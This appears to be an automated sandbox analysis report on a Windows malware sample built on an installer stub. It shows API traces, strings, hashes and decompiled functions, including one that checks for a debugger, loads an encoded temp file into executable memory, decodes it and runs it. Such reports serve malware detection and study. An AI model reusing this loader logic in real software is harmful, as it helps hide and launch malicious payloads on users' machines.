                                        • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 00405382
                                        • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 00405393
                                        • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
                                        • FindClose.KERNEL32(?), ref: 0040545B
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
                                        • "C:\Users\user\Desktop\Y4U48592345670954.exe" , xrefs: 0040530B
                                        • \*.*, xrefs: 00405363
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\Y4U48592345670954.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-405746175
                                        • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                        • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
                                        • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                        • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E6F731000() {
                                        				char _v532;
                                        				void* _t5;
                                        				void* _t8;
                                        				void* _t27;
                                        				void* _t29;
                                        				signed char _t30;
                                        				long _t31;
                                        				WCHAR* _t32;
                                        				void* _t33;
                                        				void* _t34;
                                        				DWORD* _t35;
                                        
                                        				 *_t35 = 0;
                                        				if(IsDebuggerPresent() != 0) {
                                        					DebugBreak();
                                        				}
                                        				_t32 =  &_v532;
                                        				_t5 = GetTempPathW(0x103, _t32);
                                        				if(_t5 != 0) {
                                        					lstrcatW(_t32, L"\\sn7trv7b4c9aukp2");
                                        					_t5 = CreateFileW(_t32, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                        					if(_t5 != 0xffffffff) {
                                        						_t33 = _t5;
                                        						_t5 = GetFileSize(_t5, 0);
                                        						if(_t5 != 0xffffffff) {
                                        							_t31 = _t5;
                                        							_t5 = VirtualAlloc(0, _t5, 0x3000, 0x40); // executed
                                        							 *0x6f733000 = _t5;
                                        							if(_t5 != 0) {
                                        								_t5 = ReadFile(_t33, _t5, _t31, _t35, 0); // executed
                                        								if(_t5 != 0) {
                                        									_t34 =  *0x6f733000;
                                        									if( *_t35 == 0) {
                                        										L10:
                                        										_t8 =  *_t34(); // executed
                                        										return _t8;
                                        									}
                                        									_t27 = 0;
                                        									_t29 = 0xee;
                                        									do {
                                        										_t30 = _t29 + 2;
                                        										_t29 = _t30 - 1;
                                        										 *((char*)(_t34 + _t27)) = (_t30 ^ 0x000000b6) - (_t30 ^ 0x000000b6);
                                        										_t27 = _t27 + 1;
                                        										_t34 =  *0x6f733000;
                                        									} while (_t27 <  *_t35);
                                        									goto L10;
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return _t5;
                                        			}

Instruction addresses for the listing above: 0x6f731009, 0x6f731018, 0x6f73101a, 0x6f73101a, 0x6f731020, 0x6f73102a, 0x6f731032, 0x6f73103e, 0x6f731057, 0x6f731060, 0x6f731066, 0x6f73106b, 0x6f731074, 0x6f731076, 0x6f731082, 0x6f73108a, 0x6f73108f, 0x6f731099, 0x6f7310a1, 0x6f7310a7, 0x6f7310ad, 0x6f7310f0, 0x6f7310f0, 0x00000000, 0x6f7310f0, 0x6f7310af, 0x6f7310b3, 0x6f7310b5, 0x6f7310c9, 0x6f7310db, 0x6f7310e1, 0x6f7310e4, 0x6f7310e5, 0x6f7310eb, 0x00000000, 0x6f7310b5, 0x6f7310a1, 0x6f73108f, 0x6f731074, 0x6f731060, 0x6f7310fb

                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 6F731010
                                        • DebugBreak.KERNEL32 ref: 6F73101A
                                        • GetTempPathW.KERNEL32(00000103,?), ref: 6F73102A
                                        • lstrcatW.KERNEL32(?,\sn7trv7b4c9aukp2), ref: 6F73103E
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F731057
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 6F73106B
                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6F731082
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 6F731099
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.662341168.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true
• Associated: 00000000.00000002.662335770.000000006F730000.00000002.00020000.sdmp
• Associated: 00000000.00000002.662346953.000000006F732000.00000002.00020000.sdmp
• Associated: 00000000.00000002.662351865.000000006F734000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
                                        • String ID: \sn7trv7b4c9aukp2
                                        • API String ID: 4020703165-511455160
                                        • Opcode ID: dd22a3c7c4abb88a9930841a12a0ace78b15c2273cf10ebb27a82be554f8d022
                                        • Instruction ID: 8c073a3c2b7ada9daab883144d521718932dd3b3b10743ceb25d853904411ac2
                                        • Opcode Fuzzy Hash: dd22a3c7c4abb88a9930841a12a0ace78b15c2273cf10ebb27a82be554f8d022
                                        • Instruction Fuzzy Hash: F121C873E456607FFB300A30CD4EBA63B59DB46722F11012EF595DA1C1DAA4A416CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E00401FDC(int __ebx) {
                                        				struct HINSTANCE__* _t20;
                                        				struct HINSTANCE__* _t27;
                                        				int _t28;
                                        				struct HINSTANCE__* _t33;
                                        				CHAR* _t35;
                                        				intOrPtr* _t36;
                                        				void* _t37;
                                        
                                        				_t28 = __ebx;
                                        				 *(_t37 - 4) = 1;
                                        				SetErrorMode(0x8001); // executed
                                        				if( *0x7a3030 < __ebx) {
                                        					_push(0xffffffe7);
                                        					goto L14;
                                        				} else {
                                        					_t35 = E00402A9A(0xfffffff0);
                                        					 *(_t37 + 8) = E00402A9A(1);
                                        					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
                                        						L3:
                                        						_t20 = LoadLibraryA(_t35); // executed
                                        						_t33 = _t20;
                                        						if(_t33 == _t28) {
                                        							_push(0xfffffff6);
                                        							L14:
                                        							E00401428();
                                        						} else {
                                        							goto L4;
                                        						}
                                        					} else {
                                        						_t27 = GetModuleHandleA(_t35); // executed
                                        						_t33 = _t27;
                                        						if(_t33 != __ebx) {
                                        							L4:
                                        							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
                                        							if(_t36 == _t28) {
                                        								E00404D62(0xfffffff7,  *(_t37 + 8));
                                        							} else {
                                        								 *(_t37 - 4) = _t28;
                                        								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
                                        									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000);
                                        								} else {
                                        									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
                                        									if( *_t36() != 0) {
                                        										 *(_t37 - 4) = 1;
                                        									}
                                        								}
                                        							}
                                        							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
                                        								FreeLibrary(_t33);
                                        							}
                                        						} else {
                                        							goto L3;
                                        						}
                                        					}
                                        				}
                                        				SetErrorMode(_t28);
                                        				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
                                        				return 0;
                                        			}

Instruction addresses for the listing above: 0x00401fdc, 0x00401fe4, 0x00401fe7, 0x00401ff3, 0x00402093, 0x00000000, 0x00401ff9, 0x00402001, 0x0040200b, 0x0040200e, 0x0040201d, 0x0040201e, 0x00402024, 0x00402028, 0x0040208f, 0x00402095, 0x00402095, 0x00000000, 0x00000000, 0x00000000, 0x00402010, 0x00402011, 0x00402017, 0x0040201b, 0x0040202a, 0x00402034, 0x00402038, 0x0040207c, 0x0040203a, 0x0040203d, 0x00402040, 0x00402070, 0x00402042, 0x00402045, 0x0040204e, 0x00402050, 0x00402050, 0x0040204e, 0x00402040, 0x00402084, 0x00402087, 0x00402087, 0x00000000, 0x00000000, 0x00000000, 0x0040201b, 0x0040200e, 0x0040209b, 0x00402932, 0x0040293e

                                        APIs
                                        • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                        • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                        • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                        • SetErrorMode.KERNEL32 ref: 0040209B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 1609199483-0
                                        • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                        • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
                                        • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                        • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405C94(CHAR* _a4) {
                                        				void* _t3;
                                        				void* _t8;
                                        
                                        				SetErrorMode(0x8001); // executed
                                        				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
                                        				_t8 = _t3; // executed
                                        				SetErrorMode(0); // executed
                                        				if(_t8 == 0xffffffff) {
                                        					return 0;
                                        				}
                                        				FindClose(_t8); // executed
                                        				return 0x7a15d0;
                                        			}

Instruction addresses for the listing above: 0x00405ca2, 0x00405cae, 0x00405cb6, 0x00405cb8, 0x00405cbd, 0x00000000, 0x00405cca, 0x00405cc0, 0x00000000

                                        APIs
                                        • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ), ref: 00405CA2
                                        • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                        • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                        • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ErrorFindMode$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2885216544-3081826266
                                        • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                        • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                        • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                        • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 89%
                                        			E00403526() {
                                        				intOrPtr _v4;
                                        				intOrPtr _v8;
                                        				int _v12;
                                        				int _v16;
                                        				char _v20;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr* _t20;
                                        				void* _t28;
                                        				void* _t30;
                                        				int _t31;
                                        				void* _t34;
                                        				struct HINSTANCE__* _t37;
                                        				int _t38;
                                        				int _t42;
                                        				char _t61;
                                        				CHAR* _t63;
                                        				signed char _t67;
                                        				CHAR* _t78;
                                        				intOrPtr _t80;
                                        				CHAR* _t82;
                                        				CHAR* _t84;
                                        				CHAR* _t85;
                                        
                                        				_t80 =  *0x7a2f88;
                                        				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
                                        				_t88 = _t20;
                                        				if(_t20 == 0) {
                                        					_t78 = 0x79f580;
                                        					"1033" = 0x7830;
                                        					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
                                        					__eflags =  *0x79f580;
                                        					if(__eflags == 0) {
                                        						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
                                        					}
                                        					lstrcatA("1033", _t78);
                                        				} else {
                                        					E0040591D("1033",  *_t20() & 0x0000ffff);
                                        				}
                                        				E004037F2(_t75, _t88);
                                        				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                                        				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
                                        				if(E004055AC(_t88, _t84) != 0) {
                                        					L16:
                                        					if(E004055AC(_t96, _t84) == 0) {
                                        						_push( *((intOrPtr*)(_t80 + 0x118)));
                                        						_push(_t84);
                                        						E004059E1(0, _t78, _t80);
                                        					}
                                        					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
                                        					 *0x7a2768 = _t28;
                                        					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                        						L21:
                                        						if(E00401410(0) == 0) {
                                        							_t30 = E004037F2(_t75, __eflags);
                                        							__eflags =  *0x7a3020;
                                        							if( *0x7a3020 != 0) {
                                        								_t31 = E00404E34(_t30, 0);
                                        								__eflags = _t31;
                                        								if(_t31 == 0) {
                                        									E00401410(1);
                                        									goto L33;
                                        								}
                                        								__eflags =  *0x7a274c;
                                        								if( *0x7a274c == 0) {
                                        									E00401410(2);
                                        								}
                                        								goto L22;
                                        							}
                                        							ShowWindow( *0x79f560, 5);
                                        							_t85 = "RichEd20.dll";
                                        							_t37 = LoadLibraryA(_t85);
                                        							__eflags = _t37;
                                        							if(_t37 == 0) {
                                        								M004092B6 = 0x3233;
                                        								LoadLibraryA(_t85);
                                        							}
                                        							_t82 = "RichEdit20A";
                                        							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
                                        							__eflags = _t38;
                                        							if(_t38 == 0) {
                                        								 *0x4092ac = 0;
                                        								GetClassInfoA(0, _t82, 0x7a2720);
                                        								 *0x7a2744 = _t82;
                                        								 *0x4092ac = 0x32;
                                        								RegisterClassA(0x7a2720);
                                        							}
                                        							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
                                        							E00401410(5);
                                        							return _t42;
                                        						}
                                        						L22:
                                        						_t34 = 2;
                                        						return _t34;
                                        					} else {
                                        						_t75 =  *0x7a2f80;
                                        						 *0x7a2734 = _t28;
                                        						_v20 = 0x624e5f;
                                        						 *0x7a2724 = E00401000;
                                        						 *0x7a2730 =  *0x7a2f80;
                                        						 *0x7a2744 =  &_v20;
                                        						if(RegisterClassA(0x7a2720) == 0) {
                                        							L33:
                                        							__eflags = 0;
                                        							return 0;
                                        						}
                                        						_t12 =  &_v16; // 0x624e5f
                                        						SystemParametersInfoA(0x30, 0, _t12, 0);
                                        						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
                                        						goto L21;
                                        					}
                                        				} else {
                                        					_t75 =  *(_t80 + 0x48);
                                        					if(_t75 == 0) {
                                        						goto L16;
                                        					}
                                        					_t78 = 0x7a1f20;
                                        					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
                                        					_t61 =  *0x7a1f20; // 0x49
                                        					if(_t61 == 0) {
                                        						goto L16;
                                        					}
                                        					if(_t61 == 0x22) {
                                        						_t78 = 0x7a1f21;
                                        						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
                                        					}
                                        					_t63 = lstrlenA(_t78) + _t78 - 4;
                                        					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
                                        						L15:
                                        						E004059BF(_t84, E004054CC(_t78));
                                        						goto L16;
                                        					} else {
                                        						_t67 = GetFileAttributesA(_t78);
                                        						if(_t67 == 0xffffffff) {
                                        							L14:
                                        							E00405513(_t78);
                                        							goto L15;
                                        						}
                                        						_t96 = _t67 & 0x00000010;
                                        						if((_t67 & 0x00000010) != 0) {
                                        							goto L15;
                                        						}
                                        						goto L14;
                                        					}
                                        				}
                                        			}


                                        APIs
                                          • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                          • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                          • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                        • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
                                        • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 00403607
                                        • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
                                        • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
                                        • LoadImageA.USER32 ref: 0040366E
                                        • RegisterClassA.USER32 ref: 004036B5
                                          • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
                                        • CreateWindowExA.USER32 ref: 00403706
                                        • ShowWindow.USER32(00000005,00000000), ref: 0040373C
                                        • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
                                        • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
                                        • GetClassInfoA.USER32 ref: 0040376E
                                        • GetClassInfoA.USER32 ref: 0040377D
                                        • RegisterClassA.USER32 ref: 0040378D
                                        • DialogBoxParamA.USER32 ref: 004037AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: 'z$"C:\Users\user\Desktop\Y4U48592345670954.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                        • API String ID: 914957316-123529364
                                        • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                        • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
                                        • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                        • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 81%
                                        			E00402C37(void* __eflags, signed int _a4) {
                                        				struct HWND__* _v8;
                                        				long _v12;
                                        				long _v16;
                                        				void* _v20;
                                        				intOrPtr _v24;
                                        				long _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				signed int _v48;
                                        				long _t52;
                                        				signed int _t56;
                                        				void* _t62;
                                        				intOrPtr* _t66;
                                        				long _t67;
                                        				signed int _t73;
                                        				signed int _t78;
                                        				signed int _t79;
                                        				long _t84;
                                        				intOrPtr _t89;
                                        				void* _t91;
                                        				signed int _t92;
                                        				signed int _t93;
                                        				signed int _t94;
                                        				signed int _t95;
                                        				void* _t97;
                                        				signed int _t101;
                                        				void* _t102;
                                        
                                        				_v8 = 0;
                                        				_t52 = GetTickCount();
                                        				_v16 = 0;
                                        				_v12 = 0;
                                        				_t100 = "C:\\Users\\jones\\Desktop";
                                        				_t97 = _t52 + 0x3e8;
                                        				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\jones\\Desktop", 0x400);
                                        				_t91 = E00405690(_t100, 0x80000000, 3);
                                        				_v20 = _t91;
                                        				 *0x409020 = _t91;
                                        				if(_t91 == 0xffffffff) {
                                        					return "Error launching installer";
                                        				}
                                        				E00405513(_t100);
                                        				_t56 = GetFileSize(_t91, 0);
                                        				__eflags = _t56;
                                        				 *0x79d938 = _t56;
                                        				_t101 = _t56;
                                        				if(_t56 <= 0) {
                                        					L27:
                                        					__eflags =  *0x7a2f8c;
                                        					if( *0x7a2f8c == 0) {
                                        						goto L33;
                                        					}
                                        					__eflags = _v12;
                                        					if(_v12 == 0) {
                                        						L31:
                                        						_t102 = GlobalAlloc(0x40, _v28);
                                        						E004030FF( *0x7a2f8c + 0x1c);
                                        						_push(_v28);
                                        						_push(_t102);
                                        						_push(0);
                                        						_push(0xffffffff);
                                        						_t62 = E00402EBD();
                                        						__eflags = _t62 - _v28;
                                        						if(_t62 == _v28) {
                                        							__eflags = _a4 & 0x00000002;
                                        							 *0x7a2f88 = _t102;
                                        							if((_a4 & 0x00000002) != 0) {
                                        								 *_t102 =  *_t102 | 0x00000008;
                                        								__eflags =  *_t102;
                                        							}
                                        							__eflags = _v48 & 0x00000001;
                                        							 *0x7a3020 =  *_t102 & 0x00000018;
                                        							 *0x7a2f90 =  *_t102;
                                        							if((_v48 & 0x00000001) != 0) {
                                        								 *0x7a2f94 =  *0x7a2f94 + 1;
                                        								__eflags =  *0x7a2f94;
                                        							}
                                        							_t49 = _t102 + 0x44; // 0x44
                                        							_t66 = _t49;
                                        							_t93 = 8;
                                        							do {
                                        								_t66 = _t66 - 8;
                                        								 *_t66 =  *_t66 + _t102;
                                        								_t93 = _t93 - 1;
                                        								__eflags = _t93;
                                        							} while (_t93 != 0);
                                        							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
                                        							 *(_t102 + 0x3c) = _t67;
                                        							E00405670(0x7a2fa0, _t102 + 4, 0x40);
                                        							__eflags = 0;
                                        							return 0;
                                        						}
                                        						GlobalFree(_t102);
                                        						goto L33;
                                        					}
                                        					E004030FF( *0x789930);
                                        					_t73 = E004030CD( &_v12, 4); // executed
                                        					__eflags = _t73;
                                        					if(_t73 == 0) {
                                        						goto L33;
                                        					}
                                        					__eflags = _v16 - _v12;
                                        					if(_v16 != _v12) {
                                        						goto L33;
                                        					}
                                        					goto L31;
                                        				} else {
                                        					do {
                                        						_t92 = _t101;
                                        						asm("sbb eax, eax");
                                        						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
                                        						__eflags = _t101 - _t78;
                                        						if(_t101 >= _t78) {
                                        							_t92 = _t78;
                                        						}
                                        						_t79 = E004030CD(0x795938, _t92); // executed
                                        						__eflags = _t79;
                                        						if(_t79 == 0) {
                                        							__eflags = _v8;
                                        							if(_v8 != 0) {
                                        								DestroyWindow(_v8);
                                        							}
                                        							L33:
                                        							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
                                        						}
                                        						__eflags =  *0x7a2f8c;
                                        						if( *0x7a2f8c != 0) {
                                        							__eflags = _a4 & 0x00000002;
                                        							if((_a4 & 0x00000002) == 0) {
                                        								__eflags = _v8;
                                        								if(_v8 == 0) {
                                        									_t84 = GetTickCount();
                                        									__eflags = _t84 - _t97;
                                        									if(_t84 > _t97) {
                                        										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
                                        									}
                                        								} else {
                                        									E00405CFC(0);
                                        								}
                                        							}
                                        							goto L22;
                                        						}
                                        						E00405670( &_v48, 0x795938, 0x1c);
                                        						_t94 = _v48;
                                        						__eflags = _t94 & 0xfffffff0;
                                        						if((_t94 & 0xfffffff0) != 0) {
                                        							goto L22;
                                        						}
                                        						__eflags = _v44 - 0xdeadbeef;
                                        						if(_v44 != 0xdeadbeef) {
                                        							goto L22;
                                        						}
